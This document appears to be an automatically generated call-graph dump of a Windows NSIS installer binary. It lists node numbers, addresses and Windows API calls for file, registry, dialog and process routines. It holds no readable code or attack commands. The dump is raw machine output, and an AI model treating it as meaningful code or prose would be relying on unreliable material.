3524->3526 3525->3526 3527 403fcb 3528 403fe1 3527->3528 3529 4040ee 3527->3529 3531 403e83 19 API calls 3528->3531 3530 40415d 3529->3530 3534 404231 3529->3534 3539 404132 GetDlgItem SendMessageA 3529->3539 3532 404167 GetDlgItem 3530->3532 3530->3534 3533 404037 3531->3533 3535 40417d 3532->3535 3536 4041ef 3532->3536 3537 403e83 19 API calls 3533->3537 3538 403eea 8 API calls 3534->3538 3535->3536 3543 4041a3 6 API calls 3535->3543 3536->3534 3544 404201 3536->3544 3541 404044 CheckDlgButton 3537->3541 3542 40422c 3538->3542 3558 403ea5 EnableWindow 3539->3558 3556 403ea5 EnableWindow 3541->3556 3543->3536 3547 404207 SendMessageA 3544->3547 3548 404218 3544->3548 3545 404158 3549 404256 SendMessageA 3545->3549 3547->3548 3548->3542 3551 40421e SendMessageA 3548->3551 3549->3530 3550 404062 GetDlgItem 3557 403eb8 SendMessageA 3550->3557 3551->3542 3553 404078 SendMessageA 3554 404096 GetSysColor 3553->3554 3555 40409f SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3553->3555 3554->3555 3555->3542 3556->3550 3557->3553 3558->3545 3559 4024cf 3560 402a29 18 API calls 3559->3560 3561 4024d6 3560->3561 3564 40589e GetFileAttributesA CreateFileA 3561->3564 3563 4024e2 3564->3563 3027 401751 3065 402a29 3027->3065 3029 401758 3030 401776 3029->3030 3031 40177e 3029->3031 3093 405bc7 lstrcpynA 3030->3093 3094 405bc7 lstrcpynA 3031->3094 3034 40177c 3037 405e29 5 API calls 3034->3037 3035 401789 3036 4056ba 3 API calls 3035->3036 3038 40178f lstrcatA 3036->3038 3051 40179b 3037->3051 3038->3034 3039 405ec2 2 API calls 3039->3051 3040 40587f 2 API calls 3040->3051 3042 4017b2 CompareFileTime 3042->3051 3043 401876 3044 404eb3 25 API calls 3043->3044 3046 401880 3044->3046 3045 405bc7 lstrcpynA 3045->3051 3072 402e8e 3046->3072 3047 404eb3 25 API calls 3049 401862 3047->3049 3051->3039 3051->3040 3051->3042 3051->3043 3051->3045 3053 405be9 18 API calls 3051->3053 3064 40184d 3051->3064 3071 40589e GetFileAttributesA CreateFileA 3051->3071 3095 405488 3051->3095 3052 4018a7 SetFileTime 3054 4018b9 FindCloseChangeNotification 3052->3054 3053->3051 3054->3049 3055 4018ca 3054->3055 3056 4018e2 3055->3056 3057 4018cf 3055->3057 3059 405be9 18 API calls 3056->3059 3058 405be9 18 API calls 3057->3058 3062 4018d7 lstrcatA 3058->3062 3060 4018ea 3059->3060 3063 405488 MessageBoxIndirectA 3060->3063 3062->3060 3063->3049 3064->3047 3064->3049 3066 402a35 3065->3066 3067 405be9 18 API calls 3066->3067 3068 402a56 3067->3068 3069 402a62 3068->3069 3070 405e29 5 API calls 3068->3070 3069->3029 3070->3069 3071->3051 3074 402ea4 3072->3074 3073 402ed2 3099 4030b0 ReadFile 3073->3099 3074->3073 3101 4030e2 SetFilePointer 3074->3101 3078 403044 3081 403048 3078->3081 3082 403060 3078->3082 3079 402eef GetTickCount 3080 401893 3079->3080 3089 402f3e 3079->3089 3080->3052 3080->3054 3083 4030b0 ReadFile 3081->3083 3082->3080 3085 4030b0 ReadFile 3082->3085 3086 40307b WriteFile 3082->3086 3083->3080 3084 4030b0 ReadFile 3084->3089 3085->3082 3086->3080 3087 403090 3086->3087 3087->3080 3087->3082 3088 402f94 GetTickCount 3088->3089 3089->3080 3089->3084 3089->3088 3090 402fb9 MulDiv wsprintfA 3089->3090 3091 402ff7 WriteFile 3089->3091 3092 404eb3 25 API calls 3090->3092 3091->3080 3091->3089 3092->3089 3093->3034 3094->3035 3098 40549d 3095->3098 3096 4054e9 3096->3051 3097 4054b1 MessageBoxIndirectA 3097->3096 3098->3096 3098->3097 3100 402edd 3099->3100 3100->3078 3100->3079 3100->3080 3101->3073 3565 401651 3566 402a29 18 API calls 3565->3566 3567 401657 3566->3567 3568 405ec2 2 API calls 3567->3568 3569 40165d 3568->3569 3570 401951 3571 402a0c 18 API calls 3570->3571 3572 401958 3571->3572 3573 402a0c 18 API calls 3572->3573 3574 401962 3573->3574 3575 402a29 18 API calls 3574->3575 3576 40196b 3575->3576 3577 40197e lstrlenA 3576->3577 3579 4019b9 3576->3579 3578 401988 3577->3578 3578->3579 3583 405bc7 lstrcpynA 3578->3583 3581 4019a2 3581->3579 3582 4019af lstrlenA 3581->3582 3582->3579 3583->3581 3584 4019d2 3585 402a29 18 API calls 3584->3585 3586 4019d9 3585->3586 3587 402a29 18 API calls 3586->3587 3588 4019e2 3587->3588 3589 4019e9 lstrcmpiA 3588->3589 3590 4019fb lstrcmpA 3588->3590 3591 4019ef 3589->3591 3590->3591 3592 402053 3593 402a29 18 API calls 3592->3593 3594 40205a 3593->3594 3595 402a29 18 API calls 3594->3595 3596 402064 3595->3596 3597 402a29 18 API calls 3596->3597 3598 40206d 3597->3598 3599 402a29 18 API calls 3598->3599 3600 402077 3599->3600 3601 402a29 18 API calls 3600->3601 3603 402081 3601->3603 3602 402095 CoCreateInstance 3607 4020b4 3602->3607 3609 40216a 3602->3609 3603->3602 3604 402a29 18 API calls 3603->3604 3604->3602 3605 401423 25 API calls 3606 40219c 3605->3606 3608 402149 MultiByteToWideChar 3607->3608 3607->3609 3608->3609 3609->3605 3609->3606 3610 402256 3611 402264 3610->3611 3612 40225e 3610->3612 3614 402274 3611->3614 3615 402a29 18 API calls 3611->3615 3613 402a29 18 API calls 3612->3613 3613->3611 3616 402282 3614->3616 3618 402a29 18 API calls 3614->3618 3615->3614 3617 402a29 18 API calls 3616->3617 3619 40228b WritePrivateProfileStringA 3617->3619 3618->3616 3620 4014d6 3621 402a0c 18 API calls 3620->3621 3622 4014dc Sleep 3621->3622 3624 4028be 3622->3624 3625 4035d8 3626 4035e3 3625->3626 3627 4035e7 3626->3627 3628 4035ea GlobalAlloc 3626->3628 3628->3627 3629 40245a 3639 402b33 3629->3639 3631 402464 3632 402a0c 18 API calls 3631->3632 3633 40246d 3632->3633 3634 402490 RegEnumValueA 3633->3634 3635 402484 RegEnumKeyA 3633->3635 3636 40268f 3633->3636 3634->3636 3637 4024a9 RegCloseKey 3634->3637 3635->3637 3637->3636 3640 402a29 18 API calls 3639->3640 3641 402b4c 3640->3641 3642 402b5a RegOpenKeyExA 3641->3642 3642->3631 3643 4022da 3644 40230a 3643->3644 3645 4022df 3643->3645 3646 402a29 18 API calls 3644->3646 3647 402b33 19 API calls 3645->3647 3648 402311 3646->3648 3649 4022e6 3647->3649 3654 402a69 RegOpenKeyExA 3648->3654 3650 402a29 18 API calls 3649->3650 3653 402327 3649->3653 3652 4022f7 RegDeleteValueA RegCloseKey 3650->3652 3652->3653 3661 402a94 3654->3661 3663 402ae0 3654->3663 3655 402aba RegEnumKeyA 3656 402acc RegCloseKey 3655->3656 3655->3661 3658 405f57 5 API calls 3656->3658 3657 402af1 RegCloseKey 3657->3663 3660 402adc 3658->3660 3659 402a69 5 API calls 3659->3661 3662 402b0c RegDeleteKeyA 3660->3662 3660->3663 3661->3655 3661->3656 3661->3657 3661->3659 3662->3663 3663->3653 3664 40155b 3665 402866 3664->3665 3668 405b25 wsprintfA 3665->3668 3667 40286b 3668->3667 3669 401cde GetDlgItem GetClientRect 3670 402a29 18 API calls 3669->3670 3671 401d0e LoadImageA SendMessageA 3670->3671 3672 401d2c DeleteObject 3671->3672 3673 4028be 3671->3673 3672->3673 3674 401dde 3675 402a29 18 API calls 3674->3675 3676 401de4 3675->3676 3677 402a29 18 API calls 3676->3677 3678 401ded 3677->3678 3679 402a29 18 API calls 3678->3679 3680 401df6 3679->3680 3681 402a29 18 API calls 3680->3681 3682 401dff 3681->3682 3683 401423 25 API calls 3682->3683 3684 401e06 ShellExecuteA 3683->3684 3685 401e33 3684->3685 3686 401662 3687 402a29 18 API calls 3686->3687 3688 401669 3687->3688 3689 402a29 18 API calls 3688->3689 3690 401672 3689->3690 3691 402a29 18 API calls 3690->3691 3692 40167b MoveFileA 3691->3692 3693 40168e 3692->3693 3699 401687 3692->3699 3695 405ec2 2 API calls 3693->3695 3697 40219c 3693->3697 3694 401423 25 API calls 3694->3697 3696 40169d 3695->3696 3696->3697 3698 405915 40 API calls 3696->3698 3698->3699 3699->3694 3700 401ee2 3701 402a29 18 API calls 3700->3701 3702 401ee9 3701->3702 3703 405f57 5 API calls 3702->3703 3704 401ef8 3703->3704 3705 401f10 GlobalAlloc 3704->3705 3706 401f78 3704->3706 3705->3706 3707 401f24 3705->3707 3708 405f57 5 API calls 3707->3708 3709 401f2b 3708->3709 3710 405f57 5 API calls 3709->3710 3711 401f35 3710->3711 3711->3706 3715 405b25 wsprintfA 3711->3715 3713 401f6c 3716 405b25 wsprintfA 3713->3716 3715->3713 3716->3706 3717 4023e2 3718 402b33 19 API calls 3717->3718 3719 4023ec 3718->3719 3720 402a29 18 API calls 3719->3720 3721 4023f5 3720->3721 3722 4023ff RegQueryValueExA 3721->3722 3725 40268f 3721->3725 3723 402425 RegCloseKey 3722->3723 3724 40241f 3722->3724 3723->3725 3724->3723 3728 405b25 wsprintfA 3724->3728 3728->3723 3729 401567 3730 401577 ShowWindow 3729->3730 3731 40157e 3729->3731 3730->3731 3732 40158c ShowWindow 3731->3732 3733 4028be 3731->3733 3732->3733 3734 402b6e 3735 402b96 3734->3735 3736 402b7d SetTimer 3734->3736 3737 402beb 3735->3737 3738 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3735->3738 3736->3735 3738->3737 3739 4014f0 SetForegroundWindow 3740 4028be 3739->3740 3741 402671 3742 402a29 18 API calls 3741->3742 3743 402678 FindFirstFileA 3742->3743 3744 40269b 3743->3744 3748 40268b 3743->3748 3745 4026a2 3744->3745 3749 405b25 wsprintfA 3744->3749 3750 405bc7 lstrcpynA 3745->3750 3749->3745 3750->3748 3751 404ff1 3752 405012 GetDlgItem GetDlgItem GetDlgItem 3751->3752 3753 40519d 3751->3753 3797 403eb8 SendMessageA 3752->3797 3755 4051a6 GetDlgItem CreateThread CloseHandle 3753->3755 3756 4051ce 3753->3756 3755->3756 3758 4051f9 3756->3758 3759 4051e5 ShowWindow ShowWindow 3756->3759 3760 40521b 3756->3760 3757 405083 3765 40508a GetClientRect GetSystemMetrics SendMessageA SendMessageA 3757->3765 3761 405257 3758->3761 3762 405230 ShowWindow 3758->3762 3763 40520a 3758->3763 3799 403eb8 SendMessageA 3759->3799 3764 403eea 8 API calls 3760->3764 3761->3760 3772 405262 SendMessageA 3761->3772 3768 405250 3762->3768 3769 405242 3762->3769 3767 403e5c SendMessageA 3763->3767 3778 405229 3764->3778 3770 4050f9 3765->3770 3771 4050dd SendMessageA SendMessageA 3765->3771 3767->3760 3774 403e5c SendMessageA 3768->3774 3773 404eb3 25 API calls 3769->3773 3775 40510c 3770->3775 3776 4050fe SendMessageA 3770->3776 3771->3770 3777 40527b CreatePopupMenu 3772->3777 3772->3778 3773->3768 3774->3761 3780 403e83 19 API calls 3775->3780 3776->3775 3779 405be9 18 API calls 3777->3779 3782 40528b AppendMenuA 3779->3782 3781 40511c 3780->3781 3785 405125 ShowWindow 3781->3785 3786 405159 GetDlgItem SendMessageA 3781->3786 3783 4052b1 3782->3783 3784 40529e GetWindowRect 3782->3784 3787 4052ba TrackPopupMenu 3783->3787 3784->3787 3788 405148 3785->3788 3789 40513b ShowWindow 3785->3789 3786->3778 3790 405180 SendMessageA SendMessageA 3786->3790 3787->3778 3791 4052d8 3787->3791 3798 403eb8 SendMessageA 3788->3798 3789->3788 3790->3778 3792 4052f4 SendMessageA 3791->3792 3792->3792 3794 405311 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3792->3794 3795 405333 SendMessageA 3794->3795 3795->3795 3796 405354 GlobalUnlock SetClipboardData CloseClipboard 3795->3796 3796->3778 3797->3757 3798->3786 3799->3758 3800 4024f1 3801 4024f6 3800->3801 3802 402507 3800->3802 3803 402a0c 18 API calls 3801->3803 3804 402a29 18 API calls 3802->3804 3806 4024fd 3803->3806 3805 40250e lstrlenA 3804->3805 3805->3806 3807 40252d WriteFile 3806->3807 3808 40268f 3806->3808 3807->3808 3814 4018f5 3815 40192c 3814->3815 3816 402a29 18 API calls 3815->3816 3817 401931 3816->3817 3818 4054ec 70 API calls 3817->3818 3819 40193a 3818->3819 3820 4018f8 3821 402a29 18 API calls 3820->3821 3822 4018ff 3821->3822 3823 405488 MessageBoxIndirectA 3822->3823 3824 401908 3823->3824 3825 40427a 3826 4042b0 3825->3826 3827 40428a 3825->3827 3829 403eea 8 API calls 3826->3829 3828 403e83 19 API calls 3827->3828 3830 404297 SetDlgItemTextA 3828->3830 3831 4042bc 3829->3831 3830->3826 3832 4014fe 3833 401506 3832->3833 3835 401519 3832->3835 3834 402a0c 18 API calls 3833->3834 3834->3835 3836 4025ff 3837 402606 3836->3837 3838 40286b 3836->3838 3839 402a0c 18 API calls 3837->3839 3840 402611 3839->3840 3841 402618 SetFilePointer 3840->3841 3841->3838 3842 402628 3841->3842 3844 405b25 wsprintfA 3842->3844 3844->3838 3845 401000 3846 401037 BeginPaint GetClientRect 3845->3846 3847 40100c DefWindowProcA 3845->3847 3848 4010f3 3846->3848 3850 401179 3847->3850 3851 401073 CreateBrushIndirect FillRect DeleteObject 3848->3851 3852 4010fc 3848->3852 3851->3848 3853 401102 CreateFontIndirectA 3852->3853 3854 401167 EndPaint 3852->3854 3853->3854 3855 401112 6 API calls 3853->3855 3854->3850 3855->3854 3856 404802 GetDlgItem GetDlgItem 3857 404856 7 API calls 3856->3857 3863 404a73 3856->3863 3858 4048fc DeleteObject 3857->3858 3859 4048ef SendMessageA 3857->3859 3860 404907 3858->3860 3859->3858 3861 40493e 3860->3861 3862 405be9 18 API calls 3860->3862 3864 403e83 19 API calls 3861->3864 3866 404920 SendMessageA SendMessageA 3862->3866 3869 404b5d 3863->3869 3889 404ae7 3863->3889 3909 404782 SendMessageA 3863->3909 3868 404952 3864->3868 3865 404c0c 3867 404c15 SendMessageA 3865->3867 3872 404c21 3865->3872 3866->3860 3867->3872 3874 403e83 19 API calls 3868->3874 3869->3865 3875 404bb6 SendMessageA 3869->3875 3899 404a66 3869->3899 3870 403eea 8 API calls 3876 404dfc 3870->3876 3871 404b4f SendMessageA 3871->3869 3877 404c33 ImageList_Destroy 3872->3877 3878 404c3a 3872->3878 3884 404c4a 3872->3884 3890 404960 3874->3890 3880 404bcb SendMessageA 3875->3880 3875->3899 3877->3878 3882 404c43 GlobalFree 3878->3882 3878->3884 3879 404db0 3885 404dc2 ShowWindow GetDlgItem ShowWindow 3879->3885 3879->3899 3881 404bde 3880->3881 3893 404bef SendMessageA 3881->3893 3882->3884 3883 404a34 GetWindowLongA SetWindowLongA 3886 404a4d 3883->3886 3884->3879 3892 40140b 2 API calls 3884->3892 3903 404c7c 3884->3903 3885->3899 3887 404a53 ShowWindow 3886->3887 3888 404a6b 3886->3888 3907 403eb8 SendMessageA 3887->3907 3908 403eb8 SendMessageA 3888->3908 3889->3869 3889->3871 3890->3883 3891 4049af SendMessageA 3890->3891 3894 404a2e 3890->3894 3897 4049eb SendMessageA 3890->3897 3898 4049fc SendMessageA 3890->3898 3891->3890 3892->3903 3893->3865 3894->3883 3894->3886 3897->3890 3898->3890 3899->3870 3900 404d86 InvalidateRect 3900->3879 3901 404d9c 3900->3901 3904 40473d 21 API calls 3901->3904 3902 404caa SendMessageA 3906 404cc0 3902->3906 3903->3902 3903->3906 3904->3879 3905 404d34 SendMessageA SendMessageA 3905->3906 3906->3900 3906->3905 3907->3899 3908->3863 3910 4047e1 SendMessageA 3909->3910 3911 4047a5 GetMessagePos ScreenToClient SendMessageA 3909->3911 3912 4047d9 3910->3912 3911->3912 3913 4047de 3911->3913 3912->3889 3913->3910 3914 401b02 3915 402a29 18 API calls 3914->3915 3916 401b09 3915->3916 3917 402a0c 18 API calls 3916->3917 3918 401b12 wsprintfA 3917->3918 3919 4028be 3918->3919 3920 404e03 3921 404e11 3920->3921 3922 404e28 3920->3922 3924 404e91 3921->3924 3925 404e17 3921->3925 3923 404e36 IsWindowVisible 3922->3923 3931 404e4d 3922->3931 3923->3924 3926 404e43 3923->3926 3927 404e97 CallWindowProcA 3924->3927 3928 403ecf SendMessageA 3925->3928 3929 404782 5 API calls 3926->3929 3930 404e21 3927->3930 3928->3930 3929->3931 3931->3927 3939 405bc7 lstrcpynA 3931->3939 3933 404e7c 3940 405b25 wsprintfA 3933->3940 3935 404e83 3936 40140b 2 API calls 3935->3936 3937 404e8a 3936->3937 3941 405bc7 lstrcpynA 3937->3941 3939->3933 3940->3935 3941->3924 3942 401a03 3943 402a29 18 API calls 3942->3943 3944 401a0c ExpandEnvironmentStringsA 3943->3944 3945 401a20 3944->3945 3946 401a33 3944->3946 3945->3946 3947 401a25 lstrcmpA 3945->3947 3947->3946 3948 401f84 3949 401f96 3948->3949 3950 402045 3948->3950 3951 402a29 18 API calls 3949->3951 3952 401423 25 API calls 3950->3952 3953 401f9d 3951->3953 3958 40219c 3952->3958 3954 402a29 18 API calls 3953->3954 3955 401fa6 3954->3955 3956 401fbb LoadLibraryExA 3955->3956 3957 401fae GetModuleHandleA 3955->3957 3956->3950 3959 401fcb GetProcAddress 3956->3959 3957->3956 3957->3959 3960 402018 3959->3960 3961 401fdb 3959->3961 3962 404eb3 25 API calls 3960->3962 3963 401423 25 API calls 3961->3963 3964 401feb 3961->3964 3962->3964 3963->3964 3964->3958 3965 402039 FreeLibrary 3964->3965 3965->3958 3966 401c8a 3967 402a0c 18 API calls 3966->3967 3968 401c90 IsWindow 3967->3968 3969 4019f3 3968->3969 3970 401490 3971 404eb3 25 API calls 3970->3971 3972 401497 3971->3972 3973 404612 3974 404622 3973->3974 3975 40463e 3973->3975 3984 40546c GetDlgItemTextA 3974->3984 3977 404671 3975->3977 3978 404644 SHGetPathFromIDListA 3975->3978 3979 40465b SendMessageA 3978->3979 3980 404654 3978->3980 3979->3977 3982 40140b 2 API calls 3980->3982 3981 40462f SendMessageA 3981->3975 3982->3979 3984->3981 3985 401595 3986 402a29 18 API calls 3985->3986 3987 40159c SetFileAttributesA 3986->3987 3988 4015ae 3987->3988 3989 401717 3990 402a29 18 API calls 3989->3990 3991 40171e SearchPathA 3990->3991 3992 401739 3991->3992 3993 403f97 lstrcpynA lstrlenA 3994 402899 SendMessageA 3995 4028b3 InvalidateRect 3994->3995 3996 4028be 3994->3996 3995->3996 3997 40229a 3998 402a29 18 API calls 3997->3998 3999 4022a8 3998->3999 4000 402a29 18 API calls 3999->4000 4001 4022b1 4000->4001 4002 402a29 18 API calls 4001->4002 4003 4022bb GetPrivateProfileStringA 4002->4003 4004 40149d 4005 402241 4004->4005 4006 4014ab PostQuitMessage 4004->4006 4006->4005 4007 401b23 4008 401b30 4007->4008 4009 401b74 4007->4009 4012 40222e 4008->4012 4015 401b47 4008->4015 4010 401b78 4009->4010 4011 401b9d GlobalAlloc 4009->4011 4022 401bb8 4010->4022 4028 405bc7 lstrcpynA 4010->4028 4013 405be9 18 API calls 4011->4013 4014 405be9 18 API calls 4012->4014 4013->4022 4017 40223b 4014->4017 4026 405bc7 lstrcpynA 4015->4026 4020 405488 MessageBoxIndirectA 4017->4020 4019 401b8a GlobalFree 4019->4022 4020->4022 4021 401b56 4027 405bc7 lstrcpynA 4021->4027 4024 401b65 4029 405bc7 lstrcpynA 4024->4029 4026->4021 4027->4024 4028->4019 4029->4022 4030 4021a5 4031 402a29 18 API calls 4030->4031 4032 4021ab 4031->4032 4033 402a29 18 API calls 4032->4033 4034 4021b4 4033->4034 4035 402a29 18 API calls 4034->4035 4036 4021bd 4035->4036 4037 405ec2 2 API calls 4036->4037 4038 4021c6 4037->4038 4039 4021d7 lstrlenA lstrlenA 4038->4039 4040 4021ca 4038->4040 4042 404eb3 25 API calls 4039->4042 4041 404eb3 25 API calls 4040->4041 4043 4021d2 4040->4043 4041->4043 4044 402213 SHFileOperationA 4042->4044 4044->4040 4044->4043 4045 402227 4046 40222e 4045->4046 4048 402241 4045->4048 4047 405be9 18 API calls 4046->4047 4049 40223b 4047->4049 4050 405488 MessageBoxIndirectA 4049->4050 4050->4048 4051 401ca7 4052 402a0c 18 API calls 4051->4052 4053 401cae 4052->4053 4054 402a0c 18 API calls 4053->4054 4055 401cb6 GetDlgItem 4054->4055 4056 4024eb 4055->4056 3160 40312a SetErrorMode GetVersion 3161 403162 3160->3161 3162 403168 3160->3162 3163 405f57 5 API calls 3161->3163 3164 405ee9 3 API calls 3162->3164 3163->3162 3165 40317e lstrlenA 3164->3165 3165->3162 3166 40318d 3165->3166 3167 405f57 5 API calls 3166->3167 3168 403194 3167->3168 3169 405f57 5 API calls 3168->3169 3170 40319b #17 OleInitialize SHGetFileInfoA 3169->3170 3250 405bc7 lstrcpynA 3170->3250 3172 4031d8 GetCommandLineA 3251 405bc7 lstrcpynA 3172->3251 3174 4031ea GetModuleHandleA 3175 403201 3174->3175 3176 4056e5 CharNextA 3175->3176 3177 403215 CharNextA 3176->3177 3183 403222 3177->3183 3178 40328f 3179 4032a2 GetTempPathA 3178->3179 3252 4030f9 3179->3252 3181 4032b8 3184 4032e0 DeleteFileA 3181->3184 3185 4032bc GetWindowsDirectoryA lstrcatA 3181->3185 3182 4056e5 CharNextA 3182->3183 3183->3178 3183->3182 3189 403291 3183->3189 3262 402c55 GetTickCount GetModuleFileNameA 3184->3262 3186 4030f9 12 API calls 3185->3186 3188 4032d8 3186->3188 3188->3184 3191 403361 ExitProcess OleUninitialize 3188->3191 3346 405bc7 lstrcpynA 3189->3346 3190 4032f4 3190->3191 3193 40334d 3190->3193 3197 4056e5 CharNextA 3190->3197 3194 403485 3191->3194 3195 403376 3191->3195 3290 40361a 3193->3290 3199 403528 ExitProcess 3194->3199 3204 405f57 5 API calls 3194->3204 3198 405488 MessageBoxIndirectA 3195->3198 3201 40330b 3197->3201 3203 403384 ExitProcess 3198->3203 3200 40335d 3200->3191 3208 403328 3201->3208 3209 40338c 3201->3209 3205 403498 3204->3205 3206 405f57 5 API calls 3205->3206 3207 4034a1 3206->3207 3210 405f57 5 API calls 3207->3210 3212 40579b 18 API calls 3208->3212 3211 40540f 5 API calls 3209->3211 3213 4034aa 3210->3213 3214 403391 lstrcatA 3211->3214 3215 403333 3212->3215 3216 4034c8 3213->3216 3226 4034b8 GetCurrentProcess 3213->3226 3217 4033a2 lstrcatA 3214->3217 3218 4033ad lstrcatA lstrcmpiA 3214->3218 3215->3191 3347 405bc7 lstrcpynA 3215->3347 3221 405f57 5 API calls 3216->3221 3217->3218 3218->3191 3220 4033c9 3218->3220 3224 4033d5 3220->3224 3225 4033ce 3220->3225 3222 4034ff 3221->3222 3227 403514 ExitWindowsEx 3222->3227 3232 403521 3222->3232 3223 403342 3348 405bc7 lstrcpynA 3223->3348 3230 4053f2 2 API calls 3224->3230 3229 405375 4 API calls 3225->3229 3226->3216 3227->3199 3227->3232 3231 4033d3 3229->3231 3233 4033da SetCurrentDirectoryA 3230->3233 3231->3233 3234 40140b 2 API calls 3232->3234 3235 4033f4 3233->3235 3236 4033e9 3233->3236 3234->3199 3350 405bc7 lstrcpynA 3235->3350 3349 405bc7 lstrcpynA 3236->3349 3239 405be9 18 API calls 3240 403424 DeleteFileA 3239->3240 3241 403431 CopyFileA 3240->3241 3247 403402 3240->3247 3241->3247 3242 403479 3244 405915 40 API calls 3242->3244 3243 405915 40 API calls 3243->3247 3245 403480 3244->3245 3245->3191 3246 405be9 18 API calls 3246->3247 3247->3239 3247->3242 3247->3243 3247->3246 3248 405427 2 API calls 3247->3248 3249 403465 CloseHandle 3247->3249 3248->3247 3249->3247 3250->3172 3251->3174 3253 405e29 5 API calls 3252->3253 3254 403105 3253->3254 3255 40310f 3254->3255 3256 4056ba 3 API calls 3254->3256 3255->3181 3257 403117 3256->3257 3258 4053f2 2 API calls 3257->3258 3259 40311d 3258->3259 3351 4058cd 3259->3351 3355 40589e GetFileAttributesA CreateFileA 3262->3355 3264 402c95 3282 402ca5 3264->3282 3356 405bc7 lstrcpynA 3264->3356 3266 402cbb 3267 405701 2 API calls 3266->3267 3268 402cc1 3267->3268 3357 405bc7 lstrcpynA 3268->3357 3270 402ccc GetFileSize 3271 402dc8 3270->3271 3284 402ce3 3270->3284 3358 402bf1 3271->3358 3273 402dd1 3275 402e01 GlobalAlloc 3273->3275 3273->3282 3369 4030e2 SetFilePointer 3273->3369 3274 4030b0 ReadFile 3274->3284 3370 4030e2 SetFilePointer 3275->3370 3277 402e34 3279 402bf1 6 API calls 3277->3279 3279->3282 3280 402dea 3283 4030b0 ReadFile 3280->3283 3281 402e1c 3285 402e8e 33 API calls 3281->3285 3282->3190 3286 402df5 3283->3286 3284->3271 3284->3274 3284->3277 3284->3282 3287 402bf1 6 API calls 3284->3287 3288 402e28 3285->3288 3286->3275 3286->3282 3287->3284 3288->3282 3288->3288 3289 402e65 SetFilePointer 3288->3289 3289->3282 3291 405f57 5 API calls 3290->3291 3292 40362e 3291->3292 3293 403634 3292->3293 3294 403646 3292->3294 3380 405b25 wsprintfA 3293->3380 3295 405aae 3 API calls 3294->3295 3296 403667 3295->3296 3298 403685 lstrcatA 3296->3298 3300 405aae 3 API calls 3296->3300 3299 403644 3298->3299 3371 4038e3 3299->3371 3300->3298 3303 40579b 18 API calls 3304 4036b7 3303->3304 3305 403740 3304->3305 3307 405aae 3 API calls 3304->3307 3306 40579b 18 API calls 3305->3306 3308 403746 3306->3308 3309 4036e3 3307->3309 3310 403756 LoadImageA 3308->3310 3311 405be9 18 API calls 3308->3311 3309->3305 3314 4036ff lstrlenA 3309->3314 3318 4056e5 CharNextA 3309->3318 3312 403781 RegisterClassA 3310->3312 3313 40380a 3310->3313 3311->3310 3315 403814 3312->3315 3316 4037bd SystemParametersInfoA CreateWindowExA 3312->3316 3317 40140b 2 API calls 3313->3317 3319 403733 3314->3319 3320 40370d lstrcmpiA 3314->3320 3315->3200 3316->3313 3321 403810 3317->3321 3322 4036fd 3318->3322 3324 4056ba 3 API calls 3319->3324 3320->3319 3323 40371d GetFileAttributesA 3320->3323 3321->3315 3326 4038e3 19 API calls 3321->3326 3322->3314 3325 403729 3323->3325 3327 403739 3324->3327 3325->3319 3328 405701 2 API calls 3325->3328 3329 403821 3326->3329 3381 405bc7 lstrcpynA 3327->3381 3328->3319 3331 4038b0 3329->3331 3332 40382d ShowWindow 3329->3332 3382 404f85 OleInitialize 3331->3382 3333 405ee9 3 API calls 3332->3333 3335 403845 3333->3335 3337 403853 GetClassInfoA 3335->3337 3340 405ee9 3 API calls 3335->3340 3336 4038b6 3338 4038d2 3336->3338 3339 4038ba 3336->3339 3342 403867 GetClassInfoA RegisterClassA 3337->3342 3343 40387d DialogBoxParamA 3337->3343 3341 40140b 2 API calls 3338->3341 3339->3315 3344 40140b 2 API calls 3339->3344 3340->3337 3341->3315 3342->3343 3345 40140b 2 API calls 3343->3345 3344->3315 3345->3315 3346->3179 3347->3223 3348->3193 3349->3235 3350->3247 3352 4058d8 GetTickCount GetTempFileNameA 3351->3352 3353 405904 3352->3353 3354 403128 3352->3354 3353->3352 3353->3354 3354->3181 3355->3264 3356->3266 3357->3270 3359 402c12 3358->3359 3360 402bfa 3358->3360 3363 402c22 GetTickCount 3359->3363 3364 402c1a 3359->3364 3361 402c03 DestroyWindow 3360->3361 3362 402c0a 3360->3362 3361->3362 3362->3273 3366 402c30 CreateDialogParamA ShowWindow 3363->3366 3367 402c53 3363->3367 3365 405f93 2 API calls 3364->3365 3368 402c20 3365->3368 3366->3367 3367->3273 3368->3273 3369->3280 3370->3281 3372 4038f7 3371->3372 3389 405b25 wsprintfA 3372->3389 3374 403968 3375 405be9 18 API calls 3374->3375 3376 403974 SetWindowTextA 3375->3376 3377 403990 3376->3377 3378 403695 3376->3378 3377->3378 3379 405be9 18 API calls 3377->3379 3378->3303 3379->3377 3380->3299 3381->3305 3383 403ecf SendMessageA 3382->3383 3387 404fa8 3383->3387 3384 404fcf 3385 403ecf SendMessageA 3384->3385 3386 404fe1 OleUninitialize 3385->3386 3386->3336 3387->3384 3388 401389 2 API calls 3387->3388 3388->3387 3389->3374 4057 40262e 4058 402635 4057->4058 4060 4028be 4057->4060 4059 40263b FindClose 4058->4059 4059->4060 4061 4026af 4062 402a29 18 API calls 4061->4062 4064 4026bd 4062->4064 4063 4026d3 4066 40587f 2 API calls 4063->4066 4064->4063 4065 402a29 18 API calls 4064->4065 4065->4063 4067 4026d9 4066->4067 4087 40589e GetFileAttributesA CreateFileA 4067->4087 4069 4026e6 4070 4026f2 GlobalAlloc 4069->4070 4071 40278f 4069->4071 4072 402786 CloseHandle 4070->4072 4073 40270b 4070->4073 4074 402797 DeleteFileA 4071->4074 4075 4027aa 4071->4075 4072->4071 4088 4030e2 SetFilePointer 4073->4088 4074->4075 4077 402711 4078 4030b0 ReadFile 4077->4078 4079 40271a GlobalAlloc 4078->4079 4080 40272a 4079->4080 4081 40275e WriteFile GlobalFree 4079->4081 4083 402e8e 33 API calls 4080->4083 4082 402e8e 33 API calls 4081->4082 4084 402783 4082->4084 4086 402737 4083->4086 4084->4072 4085 402755 GlobalFree 4085->4081 4086->4085 4087->4069 4088->4077 2921 4039b0 2922 403b03 2921->2922 2923 4039c8 2921->2923 2925 403b54 2922->2925 2926 403b14 GetDlgItem GetDlgItem 2922->2926 2923->2922 2924 4039d4 2923->2924 2927 4039f2 2924->2927 2928 4039df SetWindowPos 2924->2928 2930 403bae 2925->2930 3020 401389 2925->3020 3017 403e83 2926->3017 2932 4039f7 ShowWindow 2927->2932 2933 403a0f 2927->2933 2928->2927 2935 403afe 2930->2935 2994 403ecf 2930->2994 2932->2933 2936 403a31 2933->2936 2937 403a17 